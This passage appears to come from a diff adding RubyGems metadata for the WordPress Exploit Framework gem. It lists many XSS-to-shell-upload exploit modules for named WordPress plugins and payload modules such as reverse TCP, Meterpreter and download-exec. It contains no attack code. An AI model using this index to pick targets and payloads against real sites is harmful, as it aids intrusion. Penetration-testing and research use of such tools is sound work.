+- lib/wpxf/modules/exploit/xss/reflected/custom_metas_reflected_xss_shell_upload.rb
+- lib/wpxf/modules/exploit/xss/reflected/custom_permalinks_xss_shell_upload.rb
+- lib/wpxf/modules/exploit/xss/reflected/custom_search_plugin_reflected_xss_shell_upload.rb
+- lib/wpxf/modules/exploit/xss/reflected/defa_online_image_protector_reflected_xss_shell_upload.rb
+- lib/wpxf/modules/exploit/xss/reflected/donate_button_reflected_xss_shell_upload.rb
+- lib/wpxf/modules/exploit/xss/reflected/download_manager_reflected_xss_shell_upload.rb
+- lib/wpxf/modules/exploit/xss/reflected/duplicator_csrf_xss_shell_upload.rb
+- lib/wpxf/modules/exploit/xss/reflected/easy_contact_form_builder_reflected_xss_shell_upload.rb
+- lib/wpxf/modules/exploit/xss/reflected/emag_marketplace_connector_xss_shell_upload.rb
+- lib/wpxf/modules/exploit/xss/reflected/email_queue_reflected_xss_shell_upload.rb
+- lib/wpxf/modules/exploit/xss/reflected/email_users_reflected_xss_shell_upload.rb
+- lib/wpxf/modules/exploit/xss/reflected/enhanced_tooltip_glossary_reflected_xss_shell_upload.rb
+- lib/wpxf/modules/exploit/xss/reflected/error_log_viewer_reflected_xss_shell_upload.rb
+- lib/wpxf/modules/exploit/xss/reflected/events_made_easy_reflected_xss_shell_upload.rb
+- lib/wpxf/modules/exploit/xss/reflected/facebook_button_plugin_reflected_xss_shell_upload.rb
+- lib/wpxf/modules/exploit/xss/reflected/faq_wd_reflected_xss_shell_upload.rb
+- lib/wpxf/modules/exploit/xss/reflected/formbuilder_reflected_xss_shell_upload.rb
+- lib/wpxf/modules/exploit/xss/reflected/gallery_categories_reflected_xss_shell_upload.rb
+- lib/wpxf/modules/exploit/xss/reflected/gallery_plugin_reflected_xss_shell_upload.rb
+- lib/wpxf/modules/exploit/xss/reflected/gd_rating_system_xss_shell_upload.rb
+- lib/wpxf/modules/exploit/xss/reflected/google_analytics_dashboard_reflected_xss_shell_upload.rb
+- lib/wpxf/modules/exploit/xss/reflected/google_captcha_reflected_xss_shell_upload.rb
+- lib/wpxf/modules/exploit/xss/reflected/google_maps_reflected_xss_shell_upload.rb
+- lib/wpxf/modules/exploit/xss/reflected/google_one_reflected_xss_shell_upload.rb
+- lib/wpxf/modules/exploit/xss/reflected/google_shortlink_reflected_xss_shell_upload.rb
+- lib/wpxf/modules/exploit/xss/reflected/google_sitemap_plugin_reflected_xss_shell_upload.rb
+- lib/wpxf/modules/exploit/xss/reflected/gravity_forms_v1.9.15.11_reflected_xss_shell_upload.rb
+- lib/wpxf/modules/exploit/xss/reflected/hdw_tube_reflected_xss_shell_upload.rb
+- lib/wpxf/modules/exploit/xss/reflected/hero_maps_pro_reflected_xss_shell_upload.rb
+- lib/wpxf/modules/exploit/xss/reflected/htaccess_reflected_xss_shell_upload.rb
+- lib/wpxf/modules/exploit/xss/reflected/huge_it_image_gallery_reflected_xss_shell_upload.rb
+- lib/wpxf/modules/exploit/xss/reflected/import_woocommerce_reflected_xss_shell_upload.rb
+- lib/wpxf/modules/exploit/xss/reflected/impress_listings_reflected_xss_shell_upload.rb
+- lib/wpxf/modules/exploit/xss/reflected/indexisto_reflected_xss_shell_upload.rb
+- lib/wpxf/modules/exploit/xss/reflected/infusionsoft_reflected_xss_shell_upload.rb
+- lib/wpxf/modules/exploit/xss/reflected/instagram_feed_csrf_xss_shell_upload.rb
+- lib/wpxf/modules/exploit/xss/reflected/instalinker_reflected_xss_shell_upload.rb
+- lib/wpxf/modules/exploit/xss/reflected/job_board_reflected_xss_shell_upload.rb
+- lib/wpxf/modules/exploit/xss/reflected/job_manager_reflected_xss_shell_upload.rb
+- lib/wpxf/modules/exploit/xss/reflected/leenkme_reflected_xss_shell_upload.rb
+- lib/wpxf/modules/exploit/xss/reflected/lightbox_reflected_xss_shell_upload.rb
+- lib/wpxf/modules/exploit/xss/reflected/limit_attempts_reflected_xss_shell_upload.rb
+- lib/wpxf/modules/exploit/xss/reflected/link_library_reflected_xss_shell_upload.rb
+- lib/wpxf/modules/exploit/xss/reflected/magic_fields_reflected_xss_shell_upload.rb
+- lib/wpxf/modules/exploit/xss/reflected/mailchimp_for_wp_reflected_xss_shell_upload.rb
+- lib/wpxf/modules/exploit/xss/reflected/mailpoet_newsletters_reflected_xss_shell_upload.rb
+- lib/wpxf/modules/exploit/xss/reflected/mailpoet_newsletters_v272_reflected_xss_shell_upload.rb
+- lib/wpxf/modules/exploit/xss/reflected/master_slider_reflected_xss_shell_upload.rb
+- lib/wpxf/modules/exploit/xss/reflected/maxbuttons_reflected_xss_shell_upload.rb
+- lib/wpxf/modules/exploit/xss/reflected/minimax_page_layout_builder_reflected_xss_shell_upload.rb
+- lib/wpxf/modules/exploit/xss/reflected/msmc_redirect_after_comment_reflected_xss_shell_upload.rb
+- lib/wpxf/modules/exploit/xss/reflected/multilanguage_reflected_xss_shell_upload.rb
+- lib/wpxf/modules/exploit/xss/reflected/new_year_firework_reflected_xss_shell_upload.rb
+- lib/wpxf/modules/exploit/xss/reflected/ninja_forms_reflected_xss_shell_upload.rb
+- lib/wpxf/modules/exploit/xss/reflected/no_external_links_reflected_xss_shell_upload.rb
+- lib/wpxf/modules/exploit/xss/reflected/ocim_mp3_reflected_xss_shell_upload.rb
+- lib/wpxf/modules/exploit/xss/reflected/pagination_reflected_xss_shell_upload.rb
+- lib/wpxf/modules/exploit/xss/reflected/pdf_print_reflected_xss_shell_upload.rb
+- lib/wpxf/modules/exploit/xss/reflected/peters_login_redirect_reflected_xss_shell_upload.rb
+- lib/wpxf/modules/exploit/xss/reflected/photo_gallery_xss_shell_upload.rb
+- lib/wpxf/modules/exploit/xss/reflected/pinterest_feed_xss_shell_upload.rb
+- lib/wpxf/modules/exploit/xss/reflected/podlove_podcast_publisher_reflected_xss_shell_upload.rb
+- lib/wpxf/modules/exploit/xss/reflected/pondol_form_to_mail_reflected_xss_shell_upload.rb
+- lib/wpxf/modules/exploit/xss/reflected/pootle_button_reflected_xss_shell_upload.rb
+- lib/wpxf/modules/exploit/xss/reflected/popcash_integration_xss_shell_upload.rb
+- lib/wpxf/modules/exploit/xss/reflected/popup_maker_reflected_xss_shell_upload.rb
+- lib/wpxf/modules/exploit/xss/reflected/portfolio_reflected_xss_shell_upload.rb
+- lib/wpxf/modules/exploit/xss/reflected/post_to_csv_reflected_xss_shell_upload.rb
+- lib/wpxf/modules/exploit/xss/reflected/profile_builder_reflected_xss_shell_upload.rb
+- lib/wpxf/modules/exploit/xss/reflected/profile_extra_fields_reflected_xss_shell_upload.rb
+- lib/wpxf/modules/exploit/xss/reflected/promobar_reflected_xss_shell_upload.rb
+- lib/wpxf/modules/exploit/xss/reflected/propertyhive_csrf_xss_shell_upload.rb
+- lib/wpxf/modules/exploit/xss/reflected/quiz_and_survey_master_reflected_xss_shell_upload.rb
+- lib/wpxf/modules/exploit/xss/reflected/quotes_and_tips_reflected_xss_shell_upload.rb
+- lib/wpxf/modules/exploit/xss/reflected/quotes_collection_reflected_xss_shell_upload.rb
+- lib/wpxf/modules/exploit/xss/reflected/rating_bws_reflected_xss_shell_upload.rb
+- lib/wpxf/modules/exploit/xss/reflected/re_attacher_reflected_xss_shell_upload.rb
+- lib/wpxf/modules/exploit/xss/reflected/realty_reflected_xss_shell_upload.rb
+- lib/wpxf/modules/exploit/xss/reflected/registrationmagic_reflected_xss_shell_upload.rb
+- lib/wpxf/modules/exploit/xss/reflected/relevant_reflected_xss_shell_upload.rb
+- lib/wpxf/modules/exploit/xss/reflected/responsive_lightbox_reflected_xss_shell_upload.rb
+- lib/wpxf/modules/exploit/xss/reflected/rockhoist_badges_reflected_xss_shell_upload.rb
+- lib/wpxf/modules/exploit/xss/reflected/sender_reflected_xss_shell_upload.rb
+- lib/wpxf/modules/exploit/xss/reflected/simpel_reserveren_reflected_xss_shell_upload.rb
+- lib/wpxf/modules/exploit/xss/reflected/simple_slideshow_manager_reflected_xss_shell_upload.rb
+- lib/wpxf/modules/exploit/xss/reflected/slideshow_gallery_reflected_xss_shell_upload.rb
+- lib/wpxf/modules/exploit/xss/reflected/smart_marketing_xss_shell_upload.rb
+- lib/wpxf/modules/exploit/xss/reflected/social_buttons_pack_reflected_xss_shell_upload.rb
+- lib/wpxf/modules/exploit/xss/reflected/social_login_bws_reflected_xss_shell_upload.rb
+- lib/wpxf/modules/exploit/xss/reflected/social_pug_reflected_xss_shell_upload.rb
+- lib/wpxf/modules/exploit/xss/reflected/sp_project_document_manager_reflected_xss_shell_upload.rb
+- lib/wpxf/modules/exploit/xss/reflected/spamfree_reflected_xss_shell_upload.rb
+- lib/wpxf/modules/exploit/xss/reflected/spiffy_calendar_reflected_xss_shell_upload.rb
+- lib/wpxf/modules/exploit/xss/reflected/splashing_images_reflected_xss_shell_upload.rb
+- lib/wpxf/modules/exploit/xss/reflected/subscriber_reflected_xss_shell_upload.rb
+- lib/wpxf/modules/exploit/xss/reflected/tidio_gallery_reflected_xss_shell_upload.rb
+- lib/wpxf/modules/exploit/xss/reflected/timesheet_reflected_xss_shell_upload.rb
+- lib/wpxf/modules/exploit/xss/reflected/tracking_code_manager_reflected_xss_shell_upload.rb
+- lib/wpxf/modules/exploit/xss/reflected/tribulant_newsletter_reflected_xss_shell_upload.rb
+- lib/wpxf/modules/exploit/xss/reflected/tribulant_slideshow_gallery_reflected_xss_shell_upload.rb
+- lib/wpxf/modules/exploit/xss/reflected/trust_form_reflected_xss_shell_upload.rb
+- lib/wpxf/modules/exploit/xss/reflected/twitter_plugin_reflected_xss_shell_upload.rb
+- lib/wpxf/modules/exploit/xss/reflected/ultimate_csv_importer_reflected_xss_shell_upload.rb
+- lib/wpxf/modules/exploit/xss/reflected/ultimate_form_builder_lite_reflected_xss_shell_upload.rb
+- lib/wpxf/modules/exploit/xss/reflected/updater_reflected_xss_shell_upload.rb
+- lib/wpxf/modules/exploit/xss/reflected/user_access_manager_reflected_xss_shell_upload.rb
+- lib/wpxf/modules/exploit/xss/reflected/user_login_history_xss_shell_upload.rb
+- lib/wpxf/modules/exploit/xss/reflected/user_role_reflected_xss_shell_upload.rb
+- lib/wpxf/modules/exploit/xss/reflected/visitors_online_reflected_xss_shell_upload.rb
+- lib/wpxf/modules/exploit/xss/reflected/w3_total_cache_reflected_xss_shell_upload.rb
+- lib/wpxf/modules/exploit/xss/reflected/wang_guard_reflected_xss_shell_upload.rb
+- lib/wpxf/modules/exploit/xss/reflected/whizz_reflected_xss_shell_upload.rb
+- lib/wpxf/modules/exploit/xss/reflected/woo_email_control_reflected_xss_shell_upload.rb
+- lib/wpxf/modules/exploit/xss/reflected/wordpress_firewall_reflected_xss_shell_upload.rb
+- lib/wpxf/modules/exploit/xss/reflected/wp_advanced_importer_reflected_xss_shell_upload.rb
+- lib/wpxf/modules/exploit/xss/reflected/wp_filebase_download_manager_reflected_xss_shell_upload.rb
+- lib/wpxf/modules/exploit/xss/reflected/wp_live_chat_support_reflected_xss_shell_upload.rb
+- lib/wpxf/modules/exploit/xss/reflected/wp_mailster_reflected_xss_shell_upload.rb
+- lib/wpxf/modules/exploit/xss/reflected/wp_members_reflected_xss_shell_upload.rb
+- lib/wpxf/modules/exploit/xss/reflected/wp_retina_2x_xss_shell_upload.rb
+- lib/wpxf/modules/exploit/xss/reflected/wp_statistics_12.0.9_reflected_xss_shell_upload.rb
+- lib/wpxf/modules/exploit/xss/reflected/wp_statistics_reflected_xss_shell_upload.rb
+- lib/wpxf/modules/exploit/xss/reflected/wp_v4.4_xss_shell_upload.rb
+- lib/wpxf/modules/exploit/xss/reflected/wp_whois_domain_reflected_xss_shell_upload.rb
+- lib/wpxf/modules/exploit/xss/reflected/wpsolr_reflected_xss_shell_upload.rb
+- lib/wpxf/modules/exploit/xss/reflected/yoast_seo_xss_shell_upload.rb
+- lib/wpxf/modules/exploit/xss/reflected/zurl_preview_xss_shell_upload.rb
+- lib/wpxf/modules/exploit/xss/stored/admin_management_xtended_xss_shell_upload.rb
+- lib/wpxf/modules/exploit/xss/stored/all_in_one_seo_pack_xss_shell_upload.rb
+- lib/wpxf/modules/exploit/xss/stored/alo_easymail_csrf_xss_shell_upload.rb
+- lib/wpxf/modules/exploit/xss/stored/appointment_schedule_booking_system_stored_xss_shell_upload.rb
+- lib/wpxf/modules/exploit/xss/stored/arabic_font_csrf_stored_xss_shell_upload.rb
+- lib/wpxf/modules/exploit/xss/stored/caldera_forms_stored_xss_shell_upload.rb
+- lib/wpxf/modules/exploit/xss/stored/content_audit_csrf_stored_xss_shell_upload.rb
+- lib/wpxf/modules/exploit/xss/stored/dw_question_answer_stored_xss_shell_upload.rb
+- lib/wpxf/modules/exploit/xss/stored/dwnldr_xss_shell_upload.rb
+- lib/wpxf/modules/exploit/xss/stored/embed_comment_images_stored_xss_shell_upload.rb
+- lib/wpxf/modules/exploit/xss/stored/flickr_rss_csrf_xss_shell_upload.rb
+- lib/wpxf/modules/exploit/xss/stored/four04_to_three01_stored_xss_shell_upload.rb
+- lib/wpxf/modules/exploit/xss/stored/gwolle_guestbook_stored_xss_shell_upload.rb
+- lib/wpxf/modules/exploit/xss/stored/imageinject_csrf_xss_shell_upload.rb
+- lib/wpxf/modules/exploit/xss/stored/instagram_feed_csrf_stored_xss_shell_upload.rb
+- lib/wpxf/modules/exploit/xss/stored/ithemes_security_stored_xss_shell_upload.rb
+- lib/wpxf/modules/exploit/xss/stored/ithemes_security_v6.9.0_stored_xss_shell_upload.rb
+- lib/wpxf/modules/exploit/xss/stored/mdc_private_message_xss_shell_upload.rb
+- lib/wpxf/modules/exploit/xss/stored/newsletter_by_supsystic_csrf_stored_xss_shell_upload.rb
+- lib/wpxf/modules/exploit/xss/stored/participants_database_v1.7.5.9_stored_xss_shell_upload.rb
+- lib/wpxf/modules/exploit/xss/stored/safe_editor_xss_shell_upload.rb
+- lib/wpxf/modules/exploit/xss/stored/smart_google_code_inserter_xss_shell_upload.rb
+- lib/wpxf/modules/exploit/xss/stored/social_media_widget_csrf_xss_shell_upload.rb
+- lib/wpxf/modules/exploit/xss/stored/srbtranslatin_csrf_xss_shell_upload.rb
+- lib/wpxf/modules/exploit/xss/stored/ultimate_addons_for_vc_authenticated_stored_xss_shell_upload.rb
+- lib/wpxf/modules/exploit/xss/stored/ultimate_addons_for_vc_reflected_stored_xss_shell_upload.rb
+- lib/wpxf/modules/exploit/xss/stored/universal_analytics_authenticated_xss_shell_upload.rb
+- lib/wpxf/modules/exploit/xss/stored/user_login_log_authenticated_stored_xss_shell_upload.rb
+- lib/wpxf/modules/exploit/xss/stored/woo_custom_checkout_field_xss_shell_upload.rb
+- lib/wpxf/modules/exploit/xss/stored/wp_google_maps_stored_xss_shell_upload.rb
+- lib/wpxf/modules/exploit/xss/stored/wp_live_chat_support_stored_xss_shell_upload.rb
+- lib/wpxf/modules/exploit/xss/stored/wp_piwik_stored_xss_shell_upload.rb
+- lib/wpxf/modules/exploit/xss/stored/wp_v4.3_shortcode_xss_shell_upload.rb
+- lib/wpxf/net.rb
+- lib/wpxf/net/cookie_jar.rb
+- lib/wpxf/net/http_client.rb
+- lib/wpxf/net/http_options.rb
+- lib/wpxf/net/http_response.rb
+- lib/wpxf/net/http_server.rb
+- lib/wpxf/net/typhoeus_helper.rb
+- lib/wpxf/net/user_agent.rb
+- lib/wpxf/payloads/bind_php.rb
+- lib/wpxf/payloads/custom.rb
+- lib/wpxf/payloads/download_exec.rb
+- lib/wpxf/payloads/exec.rb
+- lib/wpxf/payloads/meterpreter_bind_tcp.rb
+- lib/wpxf/payloads/meterpreter_reverse_tcp.rb
+- lib/wpxf/payloads/reverse_tcp.rb
+- lib/wpxf/payloads/socket_helper.rb
+- lib/wpxf/utility.rb
+- lib/wpxf/utility/body_builder.rb
+- lib/wpxf/utility/reference_inflater.rb
+- lib/wpxf/utility/text.rb
+- lib/wpxf/versioning.rb
+- lib/wpxf/versioning/browser_versions.rb
+- lib/wpxf/versioning/os_versions.rb
+- lib/wpxf/wordpress.rb
+- lib/wpxf/wordpress/comments.rb
+- lib/wpxf/wordpress/file_download.rb
+- lib/wpxf/wordpress/fingerprint.rb
+- lib/wpxf/wordpress/hash_dump.rb
+- lib/wpxf/wordpress/login.rb
+- lib/wpxf/wordpress/options.rb
+- lib/wpxf/wordpress/plugin.rb
+- lib/wpxf/wordpress/posts.rb
+- lib/wpxf/wordpress/reflected_xss.rb
+- lib/wpxf/wordpress/shell_upload.rb
+- lib/wpxf/wordpress/staged_reflected_xss.rb
+- lib/wpxf/wordpress/stored_xss.rb
+- lib/wpxf/wordpress/urls.rb
+- lib/wpxf/wordpress/user.rb
+- lib/wpxf/wordpress/xss.rb
+- wpxf.gemspec
+homepage: https://github.com/rastating/wordpress-exploit-framework
+licenses:
+- GPL-3.0
+metadata: {}
+post_install_message: 
+rdoc_options: []
+require_paths:
+- lib
+required_ruby_version: !ruby/object:Gem::Requirement
+  requirements:
+  - - ">="
+    - !ruby/object:Gem::Version
+      version: 2.4.4
+required_rubygems_version: !ruby/object:Gem::Requirement
+  requirements:
+  - - ">"
+    - !ruby/object:Gem::Version
+      version: 1.3.1
+requirements: []
+rubyforge_project: 
+rubygems_version: 2.7.6
+signing_key: 
+specification_version: 4
+summary: WordPress Exploit Framework
+test_files: []